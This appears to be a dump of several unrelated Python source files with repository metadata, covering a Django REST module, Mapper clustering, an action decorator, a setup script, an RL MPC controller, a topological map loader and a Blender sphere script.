| 44.225564 | 139 | 0.604429 | 2,731 | 23,528 | 5.15086 | 0.127792 | 0.039099 | 0.023104 | 0.026871 | 0.410464 | 0.314708 | 0.3044 | 0.253075 | 0.210066 | 0.18618 | 0 | 0.032911 | 0.25612 | 23,528 | 531 | 140 | 44.308851 | 0.770826 | 0.018914 | 0 | 0.215247 | 1 | 0 | 0.05281 | 0.001994 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033632 | false | 0 | 0.03139 | 0 | 0.091928 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
954ff8fe22f97bb0d6f0b4fdb7dcaa8184355aa0 | 868 | py | Python | optimal_transport_morphometry/core/rest/__init__.py | girder/otm-server | 7abfe9c2d659c962784e28058d8f9a8ffc1f4991 | [
"Apache-2.0"
] | null | null | null | optimal_transport_morphometry/core/rest/__init__.py | girder/otm-server | 7abfe9c2d659c962784e28058d8f9a8ffc1f4991 | [
"Apache-2.0"
] | 5 | 2022-03-10T19:39:22.000Z | 2022-03-17T21:05:10.000Z | optimal_transport_morphometry/core/rest/__init__.py | girder/otm-server | 7abfe9c2d659c962784e28058d8f9a8ffc1f4991 | [
"Apache-2.0"
] | null | null | null | from .atlas import AtlasViewSet
from .dataset import DatasetViewSet
from .feature_image import FeatureImageViewSet
from .image import ImageViewSet
from .jacobian_image import JacobianImageViewSet
from .pending_upload import PendingUploadViewSet
from .preprocess import PreprocessingViewSet
from .registered_image import RegisteredImageViewSet
from .segmented_image import SegmentedImageViewSet
from .upload_batch import UploadBatchViewSet
from .user import UserViewSet
from .utm_analysis import UTMAnalysisViewSet
__all__ = [
'AtlasViewSet',
'BoundedLimitOffsetPagination',
'DatasetViewSet',
'FeatureImageViewSet',
'ImageViewSet',
'JacobianImageViewSet',
'PendingUploadViewSet',
'PreprocessingViewSet',
'RegisteredImageViewSet',
'SegmentedImageViewSet',
'UploadBatchViewSet',
'UserViewSet',
'UTMAnalysisViewSet',
]
| 29.931034 | 52 | 0.801843 | 69 | 868 | 9.927536 | 0.434783 | 0.080292 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135945 | 868 | 28 | 53 | 31 | 0.913333 | 0 | 0 | 0 | 0 | 0 | 0.270737 | 0.081797 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.444444 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
955013be054c4a72417ee62bd756cdccfad209de | 9,050 | py | Python | src/docs/rizvi2017_sakmapper/sakmapper/network.py | SMRUCC/Erica | 1829cf4e89681fcadd3a5f8b1be1de7db920fb49 | [
"MIT"
] | null | null | null | src/docs/rizvi2017_sakmapper/sakmapper/network.py | SMRUCC/Erica | 1829cf4e89681fcadd3a5f8b1be1de7db920fb49 | [
"MIT"
] | null | null | null | src/docs/rizvi2017_sakmapper/sakmapper/network.py | SMRUCC/Erica | 1829cf4e89681fcadd3a5f8b1be1de7db920fb49 | [
"MIT"
] | null | null | null | from math import sqrt
import numpy as np
import pandas as pd
from scipy.spatial.distance import pdist, squareform, euclidean
import networkx as nx
from sklearn import cluster
from lens import apply_lens
import scipy
def davies_bouldin(dist_mu, sigma):
DB = 0
K = len(sigma)
for i in range(K):
D_i = 0
for j in range(K):
if j == i:
continue
R_ij = (sigma[i] + sigma[j]) / dist_mu[i, j]
if R_ij > D_i:
D_i = R_ij
DB += D_i
return DB / K
def covering_patches(lens_data, resolution=10, gain=0.5, equalize=True):
cols = lens_data.columns
xmin, xmax = lens_data[cols[0]].min(), lens_data[cols[0]].max()
ymin, ymax = lens_data[cols[1]].min(), lens_data[cols[1]].max()
patch_dict = {}
if equalize:
perc_step = 100.0 / resolution
fence_posts_x = [np.percentile(lens_data[cols[0]], post) for post in np.arange(perc_step, 100, perc_step)]
fence_posts_y = [np.percentile(lens_data[cols[1]], post) for post in np.arange(perc_step, 100, perc_step)]
lower_bound_x = np.array([xmin] + fence_posts_x)
upper_bound_x = np.array(fence_posts_x + [xmax])
lower_bound_y = np.array([ymin] + fence_posts_y)
upper_bound_y = np.array(fence_posts_y + [ymax])
widths_x = upper_bound_x - lower_bound_x
spill_over_x = gain * widths_x
lower_bound_x -= spill_over_x
upper_bound_x += spill_over_x
widths_y = upper_bound_y - lower_bound_y
spill_over_y = gain * widths_y
lower_bound_y -= spill_over_y
upper_bound_y += spill_over_y
for i in range(resolution):
for j in range(resolution):
patch = list(lens_data[(lens_data[cols[0]] > lower_bound_x[i]) &
(lens_data[cols[0]] < upper_bound_x[i]) &
(lens_data[cols[1]] > lower_bound_y[j]) &
(lens_data[cols[1]] < upper_bound_y[j])].index)
key = ((round(lower_bound_x[i], 2), round(upper_bound_x[i], 2)),
(round(lower_bound_y[j], 2), round(upper_bound_y[j], 2)))
patch_dict[key] = patch
return patch_dict
else:
width_x = (xmax - xmin) / resolution
width_y = (ymax - ymin) / resolution
spill_over_x = gain * width_x
spill_over_y = gain * width_y
lower_bound_x = np.arange(xmin, xmax, width_x) - spill_over_x
upper_bound_x = np.arange(xmin, xmax, width_x) + width_x + spill_over_x
lower_bound_y = np.arange(ymin, ymax, width_y) - spill_over_y
upper_bound_y = np.arange(ymin, ymax, width_y) + width_y + spill_over_y
for i in range(resolution):
for j in range(resolution):
patch = list(lens_data[(lens_data[cols[0]] > lower_bound_x[i]) &
(lens_data[cols[0]] < upper_bound_x[i]) &
(lens_data[cols[1]] > lower_bound_y[j]) &
(lens_data[cols[1]] < upper_bound_y[j])].index)
key = ((round(lower_bound_x[i], 2), round(upper_bound_x[i], 2)),
(round(lower_bound_y[j], 2), round(upper_bound_y[j], 2)))
patch_dict[key] = patch
return patch_dict
def gap(data, refs=None, nrefs=20, ks=range(1,11), method=None):
shape = data.shape
if refs is None:
tops = data.max(axis=0)
bots = data.min(axis=0)
dists = scipy.matrix(scipy.diag(tops-bots))
rands = scipy.random.random_sample(size=(shape[0], shape[1], nrefs))
for i in range(nrefs):
rands[:, :, i] = rands[:, :, i]*dists+bots
else:
rands = refs
gaps = scipy.zeros((len(ks),))
for (i, k) in enumerate(ks):
g1 = method(n_clusters=k).fit(data)
(kmc, kml) = (g1.cluster_centers_, g1.labels_)
disp = sum([euclidean(data[m, :], kmc[kml[m], :]) for m in range(shape[0])])
refdisps = scipy.zeros((rands.shape[2],))
for j in range(rands.shape[2]):
g2 = method(n_clusters=k).fit(rands[:, :, j])
(kmc, kml) = (g2.cluster_centers_, g2.labels_)
refdisps[j] = sum([euclidean(rands[m, :, j], kmc[kml[m],:]) for m in range(shape[0])])
gaps[i] = scipy.log(scipy.mean(refdisps))-scipy.log(disp)
return gaps
def optimal_clustering(df, patch, method='kmeans', statistic='gap', max_K=5):
if len(patch) == 1:
return [patch]
if statistic == 'db':
if method == 'kmeans':
if len(patch) <= 5:
K_max = 2
else:
K_max = min(len(patch) / 2, max_K)
clustering = {}
db_index = []
X = df.ix[patch, :]
for k in range(2, K_max + 1):
kmeans = cluster.KMeans(n_clusters=k).fit(X)
clustering[k] = pd.DataFrame(kmeans.predict(X), index=patch)
dist_mu = squareform(pdist(kmeans.cluster_centers_))
sigma = []
for i in range(k):
points_in_cluster = clustering[k][clustering[k][0] == i].index
sigma.append(sqrt(X.ix[points_in_cluster, :].var(axis=0).sum()))
db_index.append(davies_bouldin(dist_mu, np.array(sigma)))
db_index = np.array(db_index)
k_optimal = np.argmin(db_index) + 2
return [list(clustering[k_optimal][clustering[k_optimal][0] == i].index) for i in range(k_optimal)]
elif method == 'agglomerative':
if len(patch) <= 5:
K_max = 2
else:
K_max = min(len(patch) / 2, max_K)
clustering = {}
db_index = []
X = df.ix[patch, :]
for k in range(2, K_max + 1):
agglomerative = cluster.AgglomerativeClustering(n_clusters=k, linkage='average').fit(X)
clustering[k] = pd.DataFrame(agglomerative.fit_predict(X), index=patch)
tmp = [list(clustering[k][clustering[k][0] == i].index) for i in range(k)]
centers = np.array([np.mean(X.ix[c, :], axis=0) for c in tmp])
dist_mu = squareform(pdist(centers))
sigma = []
for i in range(k):
points_in_cluster = clustering[k][clustering[k][0] == i].index
sigma.append(sqrt(X.ix[points_in_cluster, :].var(axis=0).sum()))
db_index.append(davies_bouldin(dist_mu, np.array(sigma)))
db_index = np.array(db_index)
k_optimal = np.argmin(db_index) + 2
return [list(clustering[k_optimal][clustering[k_optimal][0] == i].index) for i in range(k_optimal)]
elif statistic == 'gap':
X = np.array(df.ix[patch, :])
if method == 'kmeans':
f = cluster.KMeans
gaps = gap(X, ks=range(1, min(max_K, len(patch))), method=f)
k_optimal = list(gaps).index(max(gaps))+1
clustering = pd.DataFrame(f(n_clusters=k_optimal).fit_predict(X), index=patch)
return [list(clustering[clustering[0] == i].index) for i in range(k_optimal)]
else:
raise 'error: only db and gat statistics are supported'
def mapper_graph(df, lens_data=None, lens='pca', resolution=10, gain=0.5, equalize=True, clust='kmeans', stat='gap',
max_K=5):
"""
input: N x n_dim image of of raw data under lens function, as a dataframe
output: (undirected graph, list of node contents, dictionary of patches)
"""
if lens_data is None:
lens_data = apply_lens(df, lens=lens)
patch_clusterings = {}
counter = 0
patches = covering_patches(lens_data, resolution=resolution, gain=gain, equalize=equalize)
for key, patch in patches.items():
if len(patch) > 0:
patch_clusterings[key] = optimal_clustering(df, patch, method=clust, statistic=stat, max_K=max_K)
counter += 1
print 'total of {} patches required clustering'.format(counter)
all_clusters = []
for key in patch_clusterings:
all_clusters += patch_clusterings[key]
num_nodes = len(all_clusters)
print 'this implies {} nodes in the mapper graph'.format(num_nodes)
A = np.zeros((num_nodes, num_nodes))
for i in range(num_nodes):
for j in range(i):
overlap = set(all_clusters[i]).intersection(set(all_clusters[j]))
if len(overlap) > 0:
A[i, j] = 1
A[j, i] = 1
G = nx.from_numpy_matrix(A)
total = []
all_clusters_new = []
mapping = {}
cont = 0
for m in all_clusters:
total += m
for n, m in enumerate(all_clusters):
if len(m) == 1 and total.count(m) > 1:
G.remove_node(n)
else:
all_clusters_new.append(m)
mapping[n] = cont
cont += 1
H = nx.relabel_nodes(G, mapping)
return H, all_clusters_new, patches
| 40.950226 | 116 | 0.56442 | 1,271 | 9,050 | 3.81904 | 0.152636 | 0.036259 | 0.034611 | 0.024928 | 0.445818 | 0.383395 | 0.36918 | 0.323651 | 0.296663 | 0.281417 | 0 | 0.015448 | 0.306188 | 9,050 | 220 | 117 | 41.136364 | 0.757605 | 0 | 0 | 0.305263 | 0 | 0 | 0.020824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.042105 | null | null | 0.010526 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9553461c6b5d5f3e7227dd35a7b192c4ef31e24c | 3,448 | py | Python | binp/action.py | reddec/binp | d72f6b6c910ee178c221c92ce88a37120955342f | [
"MIT"
] | null | null | null | binp/action.py | reddec/binp | d72f6b6c910ee178c221c92ce88a37120955342f | [
"MIT"
] | null | null | null | binp/action.py | reddec/binp | d72f6b6c910ee178c221c92ce88a37120955342f | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from logging import getLogger
from typing import List, Callable, Awaitable, Optional, Dict
from pydantic.main import BaseModel
@dataclass
class ActionHandler:
name: str
description: str
handler: Callable[[], Awaitable]
async def __call__(self):
return await self.handler()
class ActionInfo(BaseModel):
name: str
description: str
class Action:
"""
Expose user-defined action as 'button' in UI
Expose async function as button to ui.
It will not be automatically journaled: it's up to you
add ``@binp.journal`` annotation or not.
:Example:
.. code-block:: python
from binp import BINP
from asyncio import sleep
binp = BINP()
@binp.action
async def invoke():
'''
Do something
'''
await sleep(3) # emulate some work
print("done")
By default, action will be exposed with name equal to fully-qualified
function name and description from doc-string (if exists).
Exposed name could by optionally defined manually.
.. code-block:: python
from binp import BINP
from asyncio import sleep
binp = BINP()
@binp.action(name='Do Something', description='Emulate some heavy work')
async def invoke():
await sleep(3)
print("done")
:Conflicts:
Actions are indexed by name. If multiple actions defined with the same name - the latest one will be used.
"""
def __init__(self):
self.__actions: Dict[str, ActionHandler] = {}
def __call__(self, func: Optional[Callable[[], Awaitable]] = None, *, name: Optional[str] = None,
description: Optional[str] = None):
"""
Decorator that expose function as an action in UI (ex: button)
"""
def trace_operation(fn: Callable[[], Awaitable]):
nonlocal name
nonlocal description
if name is None:
name = fn.__qualname__
if description is None:
description = "\n".join(line.strip() for line in (fn.__doc__ or '').splitlines()).strip()
if name in self.__actions:
old = self.__actions[name]
getLogger(self.__class__.__qualname__).warning("redefining UI action %r: %s => %s", name,
old.handler.__qualname__, fn.__qualname__)
self.__actions[name] = ActionHandler(name=name, description=description, handler=fn)
return fn
if func is None:
return trace_operation
return trace_operation(func)
async def invoke(self, name: str) -> bool:
"""
Invoke action by name or ignore. If handler will raise an error, the error will NOT be suppressed.
:param name: action name
:return: true if action invoked
"""
handler = self.__actions.get(name)
if handler is None:
getLogger(self.__class__.__qualname__).warning("attempt to invoke unknown action %r", name)
return False
await handler()
return True
@property
def actions(self) -> List[ActionInfo]:
"""
Copy of list of defined actions prepared for serialization.
"""
return [ActionInfo(name=x.name, description=x.description) for x in self.__actions.values()]
| 28.262295 | 110 | 0.603538 | 396 | 3,448 | 5.106061 | 0.340909 | 0.032641 | 0.020772 | 0.020772 | 0.104847 | 0.072206 | 0.072206 | 0.072206 | 0.072206 | 0.072206 | 0 | 0.00084 | 0.309165 | 3,448 | 121 | 111 | 28.495868 | 0.848027 | 0.319606 | 0 | 0.088889 | 0 | 0 | 0.035425 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088889 | false | 0 | 0.088889 | 0 | 0.511111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
95544647ff349eb4a01e5554edfa84ba7d0fcd85 | 377 | py | Python | archived/silbiocomp/Practicals/Code/oaks_test.py | mathemage/TheMulQuaBio | 63a0ad6803e2aa1b808bc4517009c18a8c190b4c | [
"MIT"
] | 1 | 2019-10-12T13:33:14.000Z | 2019-10-12T13:33:14.000Z | archived/silbiocomp/Practicals/Code/oaks_test.py | OScott19/TheMulQuaBio | 197d710f76163469dfc7fa9d2d95ba3a739eccc7 | [
"MIT"
] | null | null | null | archived/silbiocomp/Practicals/Code/oaks_test.py | OScott19/TheMulQuaBio | 197d710f76163469dfc7fa9d2d95ba3a739eccc7 | [
"MIT"
] | null | null | null | #Define function
def is_an_oak(name):
""" Returns True if name is starts with 'quercus'
>>> is_an_oak('Fagus sylvatica')
False
>>> is_an_oak('Quercus robur')
True
# A typo
>>> is_an_oak('Quercuss')
False
"""
return name.lower().startswith('quercus ')
print(is_an_oak.__doc__)
import doctest
doctest.testmod() # Run embedded tests
| 17.952381 | 53 | 0.64191 | 51 | 377 | 4.470588 | 0.607843 | 0.087719 | 0.153509 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228117 | 377 | 20 | 54 | 18.85 | 0.783505 | 0.527851 | 0 | 0 | 0 | 0 | 0.058394 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
955985352515b7765d03062b6623dbef440b0c67 | 1,353 | py | Python | setup.py | MiCHiLU/watchlion | ee24866ca2c559f0ab8d5e3c67dba2414d39810b | [
"MIT"
] | 1 | 2016-06-17T20:09:26.000Z | 2016-06-17T20:09:26.000Z | setup.py | MiCHiLU/watchlion | ee24866ca2c559f0ab8d5e3c67dba2414d39810b | [
"MIT"
] | null | null | null | setup.py | MiCHiLU/watchlion | ee24866ca2c559f0ab8d5e3c67dba2414d39810b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
setup(name="watchlion",
version="0.3",
description="Filesystem events monitoring",
long_description=open('README.rst').read(),
author="ENDOH takanao",
license="MIT",
url="http://github.com/MiCHiLU/watchlion",
keywords=' '.join([
'python',
'filesystem',
'monitoring',
'monitor',
'FSEvents',
]
),
classifiers=[
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: MacOS :: MacOS X',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries',
'Topic :: System :: Monitoring',
'Topic :: System :: Filesystems',
'Topic :: Utilities',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
],
py_modules=['watchlion'],
install_requires=['PyYAML', 'MacFSEvents'],
entry_points={
'console_scripts': [
'watchlion = watchlion:main',
]
},
zip_safe=False,
)
| 29.413043 | 53 | 0.553585 | 116 | 1,353 | 6.396552 | 0.689655 | 0.102426 | 0.134771 | 0.070081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008386 | 0.2949 | 1,353 | 45 | 54 | 30.066667 | 0.769392 | 0.031042 | 0 | 0 | 0 | 0 | 0.507257 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.02439 | 0 | 0.02439 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
955d1194e5057c9c5dcdc2ebc8966d395f199949 | 1,665 | py | Python | cloud/blog/tests.py | XINGYANGSOFT/HuaZhang-Data-Engine | f40a45273e925bb35abb17045f41a440c09b5308 | [
"Unlicense"
] | null | null | null | cloud/blog/tests.py | XINGYANGSOFT/HuaZhang-Data-Engine | f40a45273e925bb35abb17045f41a440c09b5308 | [
"Unlicense"
] | null | null | null | cloud/blog/tests.py | XINGYANGSOFT/HuaZhang-Data-Engine | f40a45273e925bb35abb17045f41a440c09b5308 | [
"Unlicense"
] | null | null | null | # -*- coding:utf-8 -*-
import urllib
import urllib.request
import json
import django.utils.http
from django.shortcuts import render_to_response
from django.http import HttpResponseRedirect
from operator import itemgetter # 排序
import time
from django.core.paginator import Paginator
servers = ['127.0.0.1:8100', '127.0.0.1:8100', '127.0.0.1:8100'] # 多台server的IP
results = []
servernum = len(servers) # 计算服务器数量,下一版本统计在线数据库数量
resultsnumbers = 0
for server in servers:
url = 'http://{}/?s={}&j=1&sort=date_modified&ascending=0&date_modified_column=1&path_column=1&c=1000'.format(
server, '1')
username = '59' # 登录everthing服务器 start
password = '119119'
p = urllib.request.HTTPPasswordMgrWithDefaultRealm()
p.add_password(None, url, username, password)
handler = urllib.request.HTTPBasicAuthHandler(p)
opener = urllib.request.build_opener(handler)
urllib.request.install_opener(opener) # 登录everthing服务器 end
response = urllib.request.urlopen(url)
data = json.loads(response.read().decode("utf-8"))
resultsnumbers = resultsnumbers + int(data['totalResults'])
for results_dic in data['results']:
date_modified = results_dic['date_modified'] # FileTime
date_modified = int(date_modified[:-7]) - 11644473600 # FileTime to UnixTime
date = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(date_modified))
results_dic['date_modified'] = date
results_dic['ip'] = server[:-5] # 在返回的字典中添加ip去掉端口号
results_dic['ip_all'] = server
results.extend(data['results'])
p = Paginator(results, 5) # 每页显示5个list的内容
page1 = p.page(1) # 第一页
print(page1.object_list) | 41.625 | 114 | 0.702703 | 213 | 1,665 | 5.389671 | 0.446009 | 0.083624 | 0.013066 | 0.015679 | 0.085366 | 0.085366 | 0.026132 | 0.026132 | 0.026132 | 0.026132 | 0 | 0.048886 | 0.164565 | 1,665 | 40 | 115 | 41.625 | 0.77642 | 0.097297 | 0 | 0 | 0 | 0.027027 | 0.152145 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.081081 | 0.243243 | 0 | 0.243243 | 0.027027 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
955daeb9c4fc7e8cfbaa3a981344aeee133bb903 | 275 | py | Python | top50.py | liyongyue/dnsspider | ab29fb240c45bf16e146e96acff41aea29591f51 | [
"0BSD"
] | null | null | null | top50.py | liyongyue/dnsspider | ab29fb240c45bf16e146e96acff41aea29591f51 | [
"0BSD"
] | null | null | null | top50.py | liyongyue/dnsspider | ab29fb240c45bf16e146e96acff41aea29591f51 | [
"0BSD"
] | null | null | null | from dnsget import dnsget
from analyse_dependency import a_d
f=open("targetd2")
line=f.readline().strip('\n')
o=open("targetd2r",'w')
target=[]
name="top50"
while (line):
target.append(line)
line=f.readline().strip('\n')
r=dnsget(target,name)
a_d(name)
f.close()
o.close()
| 18.333333 | 34 | 0.709091 | 46 | 275 | 4.173913 | 0.521739 | 0.020833 | 0.135417 | 0.1875 | 0.197917 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015873 | 0.083636 | 275 | 14 | 35 | 19.642857 | 0.746032 | 0 | 0 | 0.142857 | 0 | 0 | 0.098182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9562537d1e63988861ba9738ef70a06f9a31fe28 | 2,338 | py | Python | cs294/hw4/controllers.py | Rolight/Mooc-Assignments | 0031771c0662426af3cf9935051e3d35d08cca20 | [
"Apache-2.0"
] | null | null | null | cs294/hw4/controllers.py | Rolight/Mooc-Assignments | 0031771c0662426af3cf9935051e3d35d08cca20 | [
"Apache-2.0"
] | null | null | null | cs294/hw4/controllers.py | Rolight/Mooc-Assignments | 0031771c0662426af3cf9935051e3d35d08cca20 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from cost_functions import trajectory_cost_fn
import time
class Controller():
def __init__(self):
pass
# Get the appropriate action(s) for this state(s)
def get_action(self, state):
pass
class RandomController(Controller):
def __init__(self, env):
""" YOUR CODE HERE """
self.env = env
def get_action(self, state):
""" YOUR CODE HERE """
""" Your code should randomly sample an action uniformly from the action space """
return self.env.action_space.sample()
class MPCcontroller(Controller):
""" Controller built using the MPC method outlined in https://arxiv.org/abs/1708.02596 """
def __init__(self,
env,
dyn_model,
horizon=5,
cost_fn=None,
num_simulated_paths=10,
):
self.env = env
self.dyn_model = dyn_model
self.horizon = horizon
self.cost_fn = cost_fn
self.num_simulated_paths = num_simulated_paths
def get_action(self, state):
""" YOUR CODE HERE
Note: be careful to batch your simulations through the model for speed """
observations = np.empty(
(self.num_simulated_paths, self.horizon, self.env.observation_space.shape[0]))
next_observations = np.empty(
(self.num_simulated_paths, self.horizon, self.env.observation_space.shape[0]))
actions = [
[self.env.action_space.sample()
for _ in range(self.horizon)]
for _ in range(self.num_simulated_paths)
]
actions = np.array(actions)
last_state = np.array([state for _ in range(self.num_simulated_paths)])
for idx in range(self.horizon):
action_batch = actions[:, idx]
next_state = self.dyn_model.predict(last_state, action_batch)
observations[:, idx, :] = last_state
next_observations[:, idx, :] = next_state
last_state = next_state
costs = np.array([trajectory_cost_fn(
self.cost_fn, observations[i], actions[i],
next_observations[i])
for i in range(self.num_simulated_paths)
])
min_cost_path_id = np.argmin(costs)
return actions[min_cost_path_id][0]
| 31.594595 | 94 | 0.602652 | 284 | 2,338 | 4.71831 | 0.295775 | 0.041791 | 0.101493 | 0.09403 | 0.287313 | 0.235821 | 0.214925 | 0.168657 | 0.119403 | 0.119403 | 0 | 0.009219 | 0.304106 | 2,338 | 73 | 95 | 32.027397 | 0.814382 | 0.107357 | 0 | 0.176471 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013699 | 0 | 1 | 0.117647 | false | 0.039216 | 0.058824 | 0 | 0.27451 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9568db91ad7ce15df9b019f1095a642670567350 | 1,738 | py | Python | src/topological_navigation/scripts/topological_map.py | LCAS/spqrel_navigation | b81db88cdcb3bad385c6d56a52e79cd235bf9c9e | [
"MIT"
] | 28 | 2017-06-27T07:45:35.000Z | 2022-02-19T03:34:18.000Z | src/topological_navigation/scripts/topological_map.py | LCAS/spqrel_navigation | b81db88cdcb3bad385c6d56a52e79cd235bf9c9e | [
"MIT"
] | 12 | 2017-07-22T22:09:05.000Z | 2021-07-30T10:20:45.000Z | src/topological_navigation/scripts/topological_map.py | LCAS/spqrel_navigation | b81db88cdcb3bad385c6d56a52e79cd235bf9c9e | [
"MIT"
] | 18 | 2017-07-09T12:12:38.000Z | 2022-01-27T22:37:42.000Z | import yaml
from topological_node import TopologicalNode
class TopologicalMap(object):
def __init__(self, filename=None):
if filename:
lnodes = self._load_map(filename)
self.nodes = self._get_nodes(lnodes)
else:
self.nodes = []
def _get_nodes(self, lnodes):
nodes = []
for i in lnodes:
node = TopologicalNode(i['node'])
nodes.append(node)
return nodes
def _load_map(self, filename):
print "loading " + filename
with open(filename, 'r') as f:
return yaml.load(f)
def get_dict(self):
s = []
for i in self.nodes:
node = {}
node['node'] = {}
node['node']['pointset'] = 'NA'
node['node']['name'] = i.name
node['node']['pose'] = {}
node['node']['pose']['position'] = {
'x': i.pose.position.x,
'y': i.pose.position.y,
'z': i.pose.position.z
}
node['node']['pose']['orientation'] = {
'w': i.pose.orientation.w,
'x': i.pose.orientation.x,
'y': i.pose.orientation.y,
'z': i.pose.orientation.z
}
node['node']['edges'] = []
for j in i.edges:
dd = {}
dd['action'] = j.action
dd['edge_id'] = j.edge_id
dd['node'] = j.node
node['node']['edges'].append(dd)
node['node']['verts'] = []
for h in i.verts:
vv = {'x': h.x, 'y': h.y}
node['node']['verts'].append(vv)
s.append(node)
return s
| 28.491803 | 51 | 0.439586 | 189 | 1,738 | 3.957672 | 0.285714 | 0.139037 | 0.064171 | 0.042781 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.406214 | 1,738 | 60 | 52 | 28.966667 | 0.724806 | 0 | 0 | 0 | 0 | 0 | 0.082854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.039216 | null | null | 0.019608 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
956eeea77e797894ec059a63de8948b819247bfc | 802 | py | Python | experimental/blender/spheres.py | mcarlen/libbiarc | d016a1be643ddcded53411b4f242ac6004b65173 | [
"Apache-2.0"
] | null | null | null | experimental/blender/spheres.py | mcarlen/libbiarc | d016a1be643ddcded53411b4f242ac6004b65173 | [
"Apache-2.0"
] | 1 | 2019-08-23T09:36:29.000Z | 2019-08-26T09:56:38.000Z | experimental/blender/spheres.py | mcarlen/libbiarc | d016a1be643ddcded53411b4f242ac6004b65173 | [
"Apache-2.0"
] | 1 | 2019-08-11T21:12:02.000Z | 2019-08-11T21:12:02.000Z | """
Use this script to generate a *thick* wireframe with spheres
as joints. The input file (currently /tmp/wire.txt) is the
output file from the tool pkf2mesh!
Adjust SRadius for the cylinder size. The sphere size is
6*SRadius, change it as well if needed.
"""
from Blender import *
from Blender.Mathutils import Vector
from os import popen2, listdir
from math import sin,cos,pi, sqrt
from sys import exit
filename="/home/carlen/work/libbiarc/tools/bill_vertices.txt"
res=3
rad=0.1
file = open(filename)
def doSphere(coords, subdiv=2,radius=1):
me = Mesh.Primitives.Icosphere(subdiv, radius)
ob = Scene.GetCurrent().objects.new(me,'Mesh')
ob.loc = coords
return ob
for l in file.readlines():
doSphere(map(float,l.strip().split()), res, rad)
file.close()
